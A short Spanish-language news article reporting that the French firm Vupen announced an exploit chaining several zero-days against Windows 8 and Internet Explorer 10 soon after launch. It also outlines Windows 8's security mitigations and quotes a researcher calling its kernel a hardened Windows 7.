Menos de una semana después de que Microsoft lanzara su flamante Windows 8, los hackers franceses de Vupen han desarrollado un exploit para este nuevo sistema operativo e Internet Explorer 10. Chaouki Bekrar, CEO de Vupen, escribía en Twitter "Damos la bienvenida a #Windows 8 con varios 0Ds combinados para pwn todas las nuevas mitigaciones de exploits de Win8/IE10, Felicidades a nuestro mitigador de mitigaciones @n_joly".

Recordemos que, entre las características de seguridad de Microsoft Windows 8, se incluye por defecto DEP (Data Execution Protection) y ASLR (Address Space Layout Randomization) para aleatorizar la localización de las instrucciones de los programas en memoria e impedir que se ejecuten datos en algunas direcciones específicas. Además, se añaden técnicas antiROP (Return-oriented programming) para proteger estos dos métodos y se incluye la aplicación anti-malware Windows Defender y la última versión de Internet Explorer utiliza un "sandbox" llamado  AppContainer para intentar impedir que se ataque directamente al sistema a través del navegador.

Sin embargo, es evidente que Windows 8 no es invulnerable y ya en la conferencia Black Hat de este verano se mostraron exploits que teóricamente evadían sus medidas de seguridad. Tarjei Mandt, investigador de seguridad Azimuth Security comentaba "El kernel de Windows 8 fundamentalmente no cambia ninguno de los algoritmos usados en Windows 7 ... Más que nada es una versión fortificada de Windows 7 sin cambios estructurales significativos, pero incluye muchas más comprobaciones".